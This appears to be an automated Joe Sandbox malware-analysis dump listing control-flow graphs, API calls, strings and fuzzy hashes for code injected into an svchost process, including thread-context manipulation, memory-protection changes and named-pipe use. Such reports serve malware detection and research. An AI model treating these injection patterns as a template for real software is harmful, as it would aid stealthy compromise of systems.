                                                                                control_flow_graph 543 2a3f0669804-2a3f0669842 544 2a3f0669848-2a3f066984b 543->544 545 2a3f0669933 543->545 546 2a3f0669935-2a3f0669951 544->546 547 2a3f0669851 544->547 545->546 548 2a3f0669854 547->548 549 2a3f066985a-2a3f0669869 548->549 550 2a3f066992b 548->550 551 2a3f0669876-2a3f0669895 call 2a3f0673138 549->551 552 2a3f066986b-2a3f066986e 549->552 550->545 559 2a3f0669897-2a3f06698a0 call 2a3f0673080 551->559 560 2a3f06698ed-2a3f0669902 551->560 553 2a3f0669874 552->553 554 2a3f066990d-2a3f066991c GetProcAddress 552->554 556 2a3f06698e1-2a3f06698e8 553->556 554->550 557 2a3f066991e-2a3f0669929 554->557 556->548 557->546 565 2a3f06698a2-2a3f06698b7 call 2a3f066ad28 559->565 566 2a3f06698cf-2a3f06698d9 559->566 560->554 561 2a3f0669904-2a3f0669907 call 2a3f06730a8 560->561 561->554 565->566 569 2a3f06698b9-2a3f06698cd call 2a3f0673138 565->569 566->556 569->560 569->566
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: a09784815d73b8d83838d560ff30c642aa94032aa2060960fa1566b7bfa2870f
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 4F31A531B226509AEE91DB1A9C0875D6398F767BA0F590639BD2D8BB40FF38C6458312

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: b32aead9391b7d058d9a649eafb15739b85c12651f3e4705219a4bbe4a528d49
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 97118E21B24B508BE790CB4AEC4831977A0F3ABFE4F100225FA59C7B94EF38C6048742

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 595 2a3f0665c10-2a3f0665c37 596 2a3f0665c39-2a3f0665c48 595->596 597 2a3f0665c4b-2a3f0665c56 GetCurrentThreadId 595->597 596->597 598 2a3f0665c58-2a3f0665c5d 597->598 599 2a3f0665c62-2a3f0665c69 597->599 600 2a3f066608f-2a3f06660a6 call 2a3f0667a20 598->600 601 2a3f0665c7b-2a3f0665c8f 599->601 602 2a3f0665c6b-2a3f0665c76 call 2a3f0665a40 599->602 605 2a3f0665c9e-2a3f0665ca4 601->605 602->600 608 2a3f0665caa-2a3f0665cb3 605->608 609 2a3f0665d75-2a3f0665d96 605->609 611 2a3f0665cfa-2a3f0665d6d call 2a3f06645f0 call 2a3f0664590 call 2a3f0664550 608->611 612 2a3f0665cb5-2a3f0665cf8 call 2a3f06686a0 608->612 613 2a3f0665eff-2a3f0665f10 call 2a3f066759f 609->613 614 2a3f0665d9c-2a3f0665dbc GetThreadContext 609->614 624 2a3f0665d70 611->624 612->624 629 2a3f0665f15-2a3f0665f1b 613->629 617 2a3f0665efa 614->617 618 2a3f0665dc2-2a3f0665de3 614->618 617->613 618->617 628 2a3f0665de9-2a3f0665df2 618->628 624->605 631 2a3f0665df4-2a3f0665e05 628->631 632 2a3f0665e72-2a3f0665e83 628->632 633 2a3f0665f21-2a3f0665f78 VirtualProtect FlushInstructionCache 629->633 634 2a3f0665fde-2a3f0665fee 629->634 640 2a3f0665e07-2a3f0665e1c 631->640 641 2a3f0665e6d 631->641 635 2a3f0665ef5 632->635 636 2a3f0665e85-2a3f0665ea3 632->636 642 2a3f0665fa9-2a3f0665fd9 call 2a3f066798c 633->642 643 2a3f0665f7a-2a3f0665f84 633->643 638 2a3f0665ff0-2a3f0665ff7 634->638 639 2a3f0665ffe-2a3f066600a call 2a3f0664ed0 634->639 636->635 644 2a3f0665ea5-2a3f0665ef0 call 2a3f06639e0 call 2a3f06675bd 636->644 638->639 646 2a3f0665ff9 call 2a3f06644c0 638->646 658 2a3f066600f-2a3f0666015 639->658 640->641 648 2a3f0665e1e-2a3f0665e68 call 2a3f0663a50 SetThreadContext 640->648 641->635 642->629 643->642 649 2a3f0665f86-2a3f0665fa1 call 2a3f0664470 643->649 644->635 646->639 648->641 649->642 661 2a3f0666057-2a3f0666075 658->661 662 2a3f0666017-2a3f0666055 ResumeThread call 2a3f066798c 658->662 663 2a3f0666089 661->663 664 2a3f0666077-2a3f0666086 661->664 662->658 663->600 664->663
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 2b3ab92816807bc0e60917e2e37964209f8a8c9b00fa6083a732690c1a02887d
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: 09D1BF76614B4886DA70DB09E89535E77B0F3DAB84F100626FA8D87BA5DF39C641CB01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: 53beae3c5d9a6974889303778d771dfa8311c7940fa334471fc91e29991a7b06
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 51319821B11B658BE795DF1ADE4826DB3A0FB67784F044030AE498BF54FF38C6658701
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: 7fe3758740b57dbea068d10edbfb0c3cd789f7ff2970895ddcfce0f886558fd9
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 4001C021B20A408BEB90DB16E85C35963A1F79AFC0F884434EE8987B54EE3CCA85C301
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: dac68a6820c259bf305451f9e5c92e6851a0c680b7f667e03f33a9a1c1048ad9
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: EE115E65B217508BFBA0DB29ED0D75A63A0FB6BB45F040438E94987B54FF3CC2088702
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 13e5ac17999e125e1b6cd133bfc4922bf6558dad679240bf777ad10d916f618b
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: CA517B32B316019BEB94CB19E858B5C739DF367B88F508130AE168BB48EE35DA41C712
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: b4cda61ebdec9d6af21f0db2491c22f5516e65766a65d3aa04192fbdf08795d3
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: E3318B31B206919BE790DF19EC4C71D7799F367B88F148124BE568BB44EE38CA41C716
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: fe4cc1df9787189f5f2e48a55f0bae5b15bd8df97e3592af6e807e4563c33a73
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: BCF0492172464197E7A0CB19FD983596761F756794F888030EA498AD54FE3DC748C701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: d6fbfa9396372c93893d4f7d84835b4603644d806e3cc3c2321924bb1a274a6d
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 76F05420B2479097EA90CB1BBE1C1195215E75BFD0F044131AD5687F19EE38C7418701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: c30968bb0355038014303c55fa54c656dc0d3dc86cfe96ef2cef0652a9dcd2f0
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: B4F0F461B316449BFBD4CB68EC8C3695360EB67790F441035B51BC5965EF38C688C702
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 6f03528ed9cd145bc5542155137babb10806ed09f53ae9a93b31eb31b84cf234
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 3902AB36629B808ADBA0CB59E85535EB7A0F3D6794F104125FA8E87B68EF78C544CB01
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: 026cc51e71c301c11f9a8c5f7a1cf4b0cf7ec69a41b3693b4cd269d2025bf81d
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 78819322F30650CEFB90DB699C583AD27A5F767B84F444125FA0AD7E92FE348645C322
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: 65ea948de4f84d53239e2e134d858c5686030f7379511e80b518be24f248bb37
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 62619D36A29644CBEBA0DB59E85931E77A0F396754F100225F68D87FA4EF78C640CB01
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: b2dbd2705c35d06481d9481fe8e3df8efa3160f81306415c9a9b2ce51e0af037
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 2B116D22F74A010BF6D8916CED5E3691180FB77374F144636FA668AAD6EF388B424102
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 880a9467df9f9c07d38d590a23ae242536ae50f61415eadc3fb9d76e55d5e56e
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 6111E962B54E01C3F668A365E75E36910406F57374F480627BA76E6BD78EDA8F434203
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 6b26e9e318ee464f3dbbba6b31a944f535475c7fd0f274aca62906b5695bdb9b
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 1B113025B24B5087EB94DB29F9186597760F757B84F440139EE8987B54FF3DC604C701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 7e239ec1dbcb705c68123f9ec3e0a20114bca14b432f71548ff9377122154eb0
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: C851D3323116208BDB14CF15E648B593395FB42F98F528527EA8683788DFB5DF42D70A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: d6ce20e1202827d93e7641fac24b812cd3e040b3a20ef2aa2f1f722ee3037582
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: F1316B7231166087E714DF11EA4875937A4FB42FA8F16841BBE5A87784CFB9CB42C70A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: dcdcd21decd63d49b16fc61ddde9d443f2d245f97ebf1a748cd23d93fb76e21f
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: 4B115E31A24B98DBE794DF6AA94825A73B0F39BB84F444029EB8A47B14EF38C151C741
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: 972fb7a53272f04296945cbcb6f95a558b2c5ae395cf098e943d3b2c0a283b1a
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 4271BB32B20B824BE7A4DE2E9D583AD6754F7A7788F440135ED498BF89EE35C7048741
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 93c15d5100a3b38bc46338c085f4d7940915c577cf792d61900a57c5f43e2f38
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: B151EA32B24B824BEBB4DA2DD95C36D5651F3A7784F000035ED86CBF95EE35C6018B42
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: d300fdcb149788ce7b24d1236b1f33b62c1e445d6bb6eb66158026e158c90d0e
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: 4541B362B24A8086EB60CF29EC58399A7A0F3AA784F404035EE4DC7B44EF38C641CB51
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 7df1b5a457c453ee10fcc8731f5fbb6d5235cc434a78439a08691d8bae9f5b98
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: F5110E36B18B808AD7A0CB19F84429AB7A4F7DAB90F544136EECD87F59DF38C5508B01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 7d12fd0f5ed4de17f0a55b90b7ad43b4e29813162922e456b6fd588599dffb01
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: EE111F32614B8082EBA1CF19E94425D77E5F79AB98F184221EF8D4BB64EF38C655CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 43f4ee235811d7a18f154299ddf3391ae06c7f4f3c2cb6aaaf9d884b16b827cd
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: 0AF0B421F2079087E694DB49F9082582220EB9BB90F584031F95987F18EF38C794CB01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 41cbc397a780ed6a8236a6da1296034201499d530e9ab6c6b9e0f38a03613191
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 10E06561F206409BEA94CB58FC0C6982261EB9B780F588132F5198AA55EF38CB55C702
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
